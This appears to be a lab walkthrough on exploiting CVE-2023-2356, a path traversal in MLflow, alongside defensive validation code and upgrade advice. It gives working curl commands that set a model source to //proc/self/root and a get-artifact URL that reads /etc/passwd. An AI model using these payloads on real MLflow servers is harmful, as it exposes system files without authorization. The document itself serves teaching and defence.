MLflow Path Traversal (CVE-2023-2356)
Introduction:
Machine learning model development can be both exhilarating and challenging. As data scientists move through experimentation, model packaging, deployment, and management, they often struggle to keep the process organized. This is where MLflow comes in, bringing efficiency and structure to the machine learning workflow.
What is MLflow?
MLflow is an open-source platform designed to streamline the end-to-end machine learning lifecycle. Whether you’re a seasoned data scientist or a newcomer, MLflow offers a set of tools that support every stage of your ML work.
Primary Functions:
At its core, MLflow revolves around four primary functions, each tailored to address a specific aspect of the machine learning lifecycle:
1. Tracking experiments: MLflow Tracking serves as a robust mechanism for recording and comparing parameters and results across various experiments.
2. Packaging ML code: With MLflow Projects, you can encapsulate your machine learning code in a reusable, reproducible form, facilitating seamless sharing among peers and effortless transfer to production environments.
3. Managing and deploying models: MLflow Models provides a standard format for packaging models from diverse ML libraries and deploying them to a wide range of model serving and inference platforms.
4. Central model store: The MLflow Model Registry serves as a centralized hub for collaboratively managing the full lifecycle of MLflow Models. From versioning to stage transitions and annotations, this repository facilitates efficient model governance and collaboration.
Library-Agnostic:
One of the distinguishing features of MLflow lies in its library-agnostic nature. Regardless of the machine learning library or programming language you prefer, MLflow seamlessly integrates with your workflow. Its functionalities are accessible through a versatile REST API and CLI, accommodating a wide spectrum of preferences and requirements.
API:
To further enhance accessibility and convenience, MLflow provides dedicated APIs for Python, R, and Java, catering to the diverse needs of the data science community.
Security Advisory:
While MLflow offers powerful capabilities, it’s essential to stay alert to potential vulnerabilities. A relative path traversal vulnerability, tracked as CVE-2023-2356, was identified in MLflow versions prior to 2.3.1. It can expose files on the tracking server’s local filesystem to an attacker, posing a security risk.
Solution:
To mitigate this vulnerability, apply the recommended measures:
- Disallow relative paths in model version sources.
- Accept only absolute paths.
- Promptly update MLflow to version 2.3.1 or later to pick up the security fix and other bug fixes.
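The first two measures can be expressed as a server-side check on the source field sent to model-versions/create. The following is a minimal Python sketch under stated assumptions: it treats sources as plain POSIX paths (real MLflow sources are often URIs such as s3:// or runs:/, which would need URI-aware handling), and validate_model_source is a hypothetical name, not MLflow’s actual patch.

```python
from pathlib import PurePosixPath


def validate_model_source(source: str) -> str:
    """Hypothetical check for a model version's source.

    Assumes sources are plain POSIX paths. Rejects relative paths and any
    path containing '..' segments; returns the normalized path otherwise.
    """
    # Drops '.' and redundant slashes (except a leading '//'), keeps '..'.
    path = PurePosixPath(source)
    if not path.is_absolute():
        raise ValueError(f"source must be an absolute path: {source!r}")
    if ".." in path.parts:
        raise ValueError(f"source must not contain '..' segments: {source!r}")
    return str(path)


if __name__ == "__main__":
    for candidate in ["/srv/mlflow-artifacts/models/1", "etc/passwd", "/srv/../etc"]:
        try:
            print("accepted:", validate_model_source(candidate))
        except ValueError as err:
            print("rejected:", err)
```

A check like this still accepts //proc/self/root, which is an absolute path, so on its own it does not stop the payload used in the lab; confining resolved paths to an allowed artifact directory and upgrading MLflow remain necessary.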
For details of the mitigation and the code changes, refer to the upstream GitHub commit that fixed the issue.
In short, MLflow helps data scientists navigate the complexities of the ML lifecycle with confidence and efficiency, whether they are starting a new project or optimizing existing workflows. The following lab walks through exploiting CVE-2023-2356 on a vulnerable MLflow instance.
Open your web browser and navigate to the lab’s MLflow web application at http://demo.ine.local. You should see the MLflow web interface, as shown in the image.
Go to the Models tab; no models have been created yet.
Let’s use the MLflow REST API to create one.
Use the following command to register a model.
curl -X POST http://demo.ine.local/api/2.0/mlflow/registered-models/create -H "Content-type: application/json" -d '{"name": "testModel"}'
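Since MLflow’s functionality is exposed over a REST API, the same registration call can also be scripted. This is a minimal Python sketch using only the standard library, assuming the lab host http://demo.ine.local; build_register_model_request is a hypothetical helper name, and the code only constructs the request so it can be inspected before anything is sent.

```python
import json
import urllib.request


def build_register_model_request(base_url: str, name: str) -> urllib.request.Request:
    """Build, but do not send, the same POST as the curl command above."""
    url = f"{base_url.rstrip('/')}/api/2.0/mlflow/registered-models/create"
    body = json.dumps({"name": name}).encode("utf-8")
    return urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


if __name__ == "__main__":
    req = build_register_model_request("http://demo.ine.local", "testModel")
    print(req.get_method(), req.full_url)
    print(req.data.decode("utf-8"))
```

Passing the returned request to urllib.request.urlopen sends it; do so only against the lab host or a server you are authorized to test.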
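Run the following command to create a version for the registered model. Note the source value: /proc/self/root is a Linux symlink to the server process’s root directory, so this model version’s artifact location effectively points at the server’s entire filesystem.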
curl -X POST http://demo.ine.local/api/2.0/mlflow/model-versions/create -H "Content-type: application/json" -d '{"name":"testModel", "source":"//proc/self/root"}'
Switch back to the browser and refresh the page; the model now appears as registered.
Please open a new tab in your web browser and enter the following URL:
http://demo.ine.local/model-versions/get-artifact?path=etc/passwd&name=testModel&version=1
This endpoint is intended to retrieve model version artifacts from the tracking server’s local filesystem. Here, it returns the contents of the local password file instead.
The server uses the “path” parameter to build the file path of the requested artifact, relative to the model version’s source. Because this parameter is user-controlled and not properly validated, an attacker can use it to reach files outside the intended directory structure. In this case, “path=etc/passwd” combined with the source //proc/self/root resolves to the /etc/passwd file, which typically stores user account information on Unix-based systems.
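One way to enforce the input validation and file-system restrictions discussed here is to resolve the final artifact path and confirm it stays inside a directory the server intends to serve. The following Python sketch illustrates the idea under stated assumptions: the allowed root /srv/mlflow-artifacts and the names resolve_artifact_path and ArtifactPathError are hypothetical, and this is not MLflow’s actual implementation.

```python
import os


class ArtifactPathError(ValueError):
    """Raised when a requested artifact resolves outside the allowed root."""


def resolve_artifact_path(allowed_root: str, source: str, user_path: str) -> str:
    """Join a model version's source with a user-supplied path, then verify
    that the result stays inside allowed_root (hypothetical helper)."""
    # realpath() collapses '..' segments and follows symlinks
    # (on Linux, /proc/self/root points to '/').
    root = os.path.realpath(allowed_root)
    # os.path.join() discards source entirely if user_path is absolute.
    candidate = os.path.realpath(os.path.join(source, user_path))
    # commonpath() equals root only when candidate is root or lies beneath it.
    if os.path.commonpath([root, candidate]) != root:
        raise ArtifactPathError(f"{user_path!r} resolves outside {allowed_root!r}")
    return candidate


if __name__ == "__main__":
    root = "/srv/mlflow-artifacts"
    attempts = [
        ("/srv/mlflow-artifacts/models/1", "MLmodel"),  # legitimate artifact
        ("//proc/self/root", "etc/passwd"),              # the lab's payload
        ("/srv/mlflow-artifacts/models/1", "../../../../etc/passwd"),
    ]
    for source, path in attempts:
        try:
            print("serve:", resolve_artifact_path(root, source, path))
        except ArtifactPathError as err:
            print("reject:", err)
```

os.path.commonpath compares whole path components, so a sibling directory such as /srv/mlflow-artifacts-evil is not mistaken for a subdirectory of the root, which a plain string-prefix check would allow.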
Conclusion:
Through this lab, we’ve illustrated how attackers can exploit vulnerabilities within a web application if proper preventive measures are not implemented. It underscores the critical importance of robust input validation and sanitization for user-controlled inputs, as well as the implementation of stringent access controls to limit file system access. By adhering to these measures, organizations can effectively mitigate the risk of path traversal vulnerabilities and prevent unauthorized access to sensitive files on their systems.
Mitigation:
To address the vulnerability highlighted in this lab, upgrade MLflow to version 2.3.1 or later, ideally the latest release. Doing so provides the security fix for CVE-2023-2356 along with other patches that reduce the risk of exploitation.
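Before and after upgrading, it can help to check whether an installed MLflow release falls in the affected range (prior to 2.3.1). The following is a minimal Python sketch assuming simple numeric version strings; parse_release and is_patched are hypothetical helper names. It compares only the numeric release segment, so a pre-release such as 2.3.1rc0 is treated as patched even though it precedes 2.3.1; the packaging library’s Version class gives exact PEP 440 ordering.

```python
import re
from importlib import metadata

# First release not affected by CVE-2023-2356 (affected: versions prior to 2.3.1).
FIXED_RELEASE = (2, 3, 1)


def parse_release(version: str) -> tuple[int, ...]:
    """Return the leading numeric release segment, e.g. '2.3.0rc1' -> (2, 3, 0)."""
    match = re.match(r"\s*v?(\d+(?:\.\d+)*)", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part) for part in match.group(1).split("."))


def is_patched(version: str) -> bool:
    release = parse_release(version)
    # Pad short versions so '2.4' compares like '2.4.0'.
    release += (0,) * (len(FIXED_RELEASE) - len(release))
    return release >= FIXED_RELEASE


if __name__ == "__main__":
    try:
        installed = metadata.version("mlflow")
    except metadata.PackageNotFoundError:
        print("mlflow is not installed in this environment")
    else:
        verdict = "not affected" if is_patched(installed) else "affected: upgrade"
        print(f"mlflow {installed}: {verdict}")
```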